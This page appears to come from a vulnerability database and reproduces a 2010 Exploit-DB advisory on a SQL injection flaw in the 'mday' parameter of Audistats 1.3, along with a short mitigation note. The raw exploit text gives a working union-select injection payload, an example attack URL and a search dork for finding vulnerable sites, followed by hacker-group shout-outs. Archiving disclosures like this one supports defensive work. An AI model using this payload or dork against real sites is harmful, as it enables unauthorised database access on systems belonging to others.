Audistats SQL injection vulnerability - (mday)

vendor:

Audistats

by:

kaMtiEz

7,5

CVSS

HIGH

SQL injection

CWE

Product Name: Audistats

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: YES

Related CWE: N/A

CPE: a:adubus:audistat

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Audistats SQL injection vulnerability – (mday)

A SQL injection vulnerability exists in Audistats version 1.3 or lower. An attacker can send a maliciously crafted HTTP request containing a specially crafted 'mday' parameter to the vulnerable server to exploit this vulnerability.

Mitigation:

Upgrade to the latest version of Audistats

Source

Exploit-DB raw data:

###################################################################################
                                                                                  #
[~] Audistats SQL injection vulnerability - (mday)                                # 
[~] Author	: kaMtiEz (kamzcrew@yahoo.com)                                    #
[~] Homepage	: http://www.indonesiancoder.com                                  #
[~] Date	: January 29, 2010                                                #
                                                                                  #
###################################################################################

[ Software Information ]

[+] Vendor : http://adubus.free.fr/audistat/
[+] Download : http://adubus.free.fr/audistat/
[+] version : 1.3 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : -            
[+] Location : INDONESIA - JOGJA

##################################################################################


[ HERE WE GO .. LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/?year=kaMtiEz&month=tukulesto&mday=[INDONESIANCODER]

[ Exploit ]

-666+union+all+select+@@version,user()--

[ Example ]

http://[server]/stats/?year=kaMtiEz&month=tukulesto&mday=-15+union+all+select+@@version,user()--

===========================================================================

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,ibl13Z
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk,r3m1ck

[ NOTE ] 

[+] Belajar Belajar Dan Belajar !!
[+] Jack im commiinnggggggggggggggggggggggggggggggggg .. ^_^

[ QUOTE ]

[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..